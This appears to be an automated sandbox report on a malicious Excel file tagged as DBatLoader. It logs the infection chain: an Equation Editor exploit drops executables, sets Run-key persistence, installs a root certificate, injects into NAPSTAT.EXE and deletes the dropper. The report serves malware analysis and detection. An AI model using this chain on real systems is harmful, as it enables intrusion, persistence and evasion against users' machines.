Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFBB8 NtQueryInformationToken,LdrInitializeThunk,	12_2_01FBFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_01FBFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFB50 NtCreateKey,LdrInitializeThunk,	12_2_01FBFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_01FBFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_01FBFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFAB8 NtQueryValueKey,LdrInitializeThunk,	12_2_01FBFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_01FBFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFD8C NtDelayExecution,LdrInitializeThunk,	12_2_01FBFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC60 NtMapViewOfSection,LdrInitializeThunk,	12_2_01FBFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFFB4 NtCreateSection,LdrInitializeThunk,	12_2_01FBFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_01FBFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC01D4 NtSetValueKey,	12_2_01FC01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC1148 NtOpenThread,	12_2_01FC1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC010C NtOpenDirectoryObject,	12_2_01FC010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC10D0 NtOpenProcessToken,	12_2_01FC10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0078 NtResumeThread,	12_2_01FC0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0060 NtQuerySection,	12_2_01FC0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0048 NtProtectVirtualMemory,	12_2_01FC0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF938 NtWriteFile,	12_2_01FBF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC1930 NtSetContextThread,	12_2_01FC1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF8CC NtWaitForSingleObject,	12_2_01FBF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFBE8 NtQueryVirtualMemory,	12_2_01FBFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFA50 NtEnumerateValueKey,	12_2_01FBFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFA20 NtQueryInformationFile,	12_2_01FBFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC1D80 NtSuspendThread,	12_2_01FC1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFD5C NtEnumerateKey,	12_2_01FBFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC90 NtUnmapViewOfSection,	12_2_01FBFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC48 NtSetInformationFile,	12_2_01FBFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0C40 NtGetContextThread,	12_2_01FC0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC30 NtOpenProcess,	12_2_01FBFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFFFC NtCreateProcessEx,	12_2_01FBFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFF34 NtQueueApcThread,	12_2_01FBFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFEA0 NtReadVirtualMemory,	12_2_01FBFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFE24 NtWriteVirtualMemory,	12_2_01FBFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_000985E0 NtCreateFile,	12_2_000985E0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00098690 NtReadFile,	12_2_00098690
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00098710 NtClose,	12_2_00098710
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_000987C0 NtAllocateVirtualMemory,	12_2_000987C0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	12_2_00396A82
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	12_2_00396F06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396F12 NtQueryInformationProcess,	12_2_00396F12

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$7009.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@11/33@8/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00423F40 GetLastError,FormatMessageA,

4_2_00423F40

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource,

4_2_0041C8A8

Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: 7009.xlsx	Virustotal: Detection: 35%
Source: 7009.xlsx	ReversingLabs: Detection: 40%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...................0.......................2.......................			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........@1........4.t...........0.......................&.......................			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE55E.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00408B32 GetDiskFreeSpaceA,

4_2_00408B32

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected DBatLoader

Source: Yara match	File source: 10.3.Odhbljup.exe.1d02094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d82094.284.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d598.276.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.332094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.331ef4.277.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d81ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1d01ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.331ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.331f44.281.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d594.280.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d81f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.31d734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1d01f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0043DD6C push 0043DDF9h; ret	4_2_0043DDF1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00458108 push 00458140h; ret	4_2_00458138
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A1F4 push 0042A220h; ret	4_2_0042A218
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx	4_2_004201FD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00458180 push 004581ACh; ret	4_2_004581A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A1AC push 0042A1EAh; ret	4_2_0042A1E2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045A1B4 push 0045A427h; ret	4_2_0045A41F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A22C push 0042A264h; ret	4_2_0042A25C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C294 push 0042C2D7h; ret	4_2_0042C2CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406340 push 00406391h; ret	4_2_00406389
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C30C push 0042C338h; ret	4_2_0042C330
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428448 push 00428518h; ret	4_2_00428510
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A550 push 0042A57Ch; ret	4_2_0042A574
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040E5F8 push 0040E624h; ret	4_2_0040E61C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406588 push 004065B4h; ret	4_2_004065AC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406600 push 0040662Ch; ret	4_2_00406624
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00414628 push ecx; mov dword ptr [esp], eax	4_2_0041462B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428628 push 00428654h; ret	4_2_0042864C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A6FC push 0042A728h; ret	4_2_0042A720
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx	4_2_0041C6A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00440764 push 00440790h; ret	4_2_00440788
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004547B8 push 004547F0h; ret	4_2_004547E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004288FC push 00428928h; ret	4_2_00428920
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045A958 push 0045A984h; ret	4_2_0045A97C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C918 push 0042C971h; ret	4_2_0042C969
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004289F8 push 00428A24h; ret	4_2_00428A1C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041C9FF pushfd ; retf 0041h	4_2_0041CA51
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045A990 push 0045A9B6h; ret	4_2_0045A9AE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C9B4 push 0042C9ECh; ret	4_2_0042C9E4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042CA48 push 0042CA74h; ret	4_2_0042CA6C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx	4_2_0043EAA0

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00459820 LoadLibraryA,GetProcAddress,

4_2_00459820

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\Odhbljup.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\Odhbljup.exe			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\Odhbljup.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup			Jump to behavior
Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	4_2_00451054
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	4_2_0044E03C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0043812C IsIconic,GetCapture,	4_2_0043812C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	4_2_004389E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,	4_2_00428C3C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	4_2_00439260
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	4_2_00451770
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	4_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	7_2_00451054
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	7_2_0044E03C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0043812C IsIconic,GetCapture,	7_2_0043812C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	7_2_004389E0
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,	7_2_00428C3C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	7_2_00439260
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	7_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	7_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	10_2_00451054
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	10_2_0044E03C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0043812C IsIconic,GetCapture,	10_2_0043812C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	10_2_004389E0
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,	10_2_00428C3C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	10_2_00439260
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	10_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	10_2_00451820

Stores large binary data to the registry

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0042A8F4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_0042A8F4

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
